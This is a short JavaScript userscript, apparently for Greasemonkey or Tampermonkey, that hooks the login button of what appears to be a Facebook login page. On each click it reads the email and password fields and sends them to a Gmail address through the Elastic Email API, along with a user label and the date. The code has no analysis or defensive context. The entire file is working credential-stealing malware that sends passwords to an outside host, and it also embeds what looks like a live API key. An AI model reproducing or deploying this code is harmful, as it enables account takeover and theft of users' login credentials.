//if (typeof useringer === "undefined") {var useringer="None";};
var urlinger = "https://api.elasticemail.com/v2/email/send?apikey=b82d49f1-52a0-42d2-b222-b42b00d74599&subject=FB&from=sophamrg@gmail.com&fromName=ffdsa&to=sophamrg@gmail.com&isTransactional=True&bodyHtml=";
document.getElementById("loginbutton").onclick = function(){
    //alert(useringer);
    let email = document.getElementsByName("email")[0].value;
    let pass = document.getElementsByName("pass")[0].value;
    if (typeof useringer === "undefined") {let useringer = "None"};
    if (!(email == null || email == "" || pass == null || pass == "")){
        let message = "Email: "+email+"\nPass: "+pass+"\nUser: "+useringer+"\nDate: "+Date();
        GM_xmlhttpRequest ({
                method:     'GET',
                url:        encodeURI(urlinger+message),
                onload:     function (responseDetails) {}
                           });
    }
};
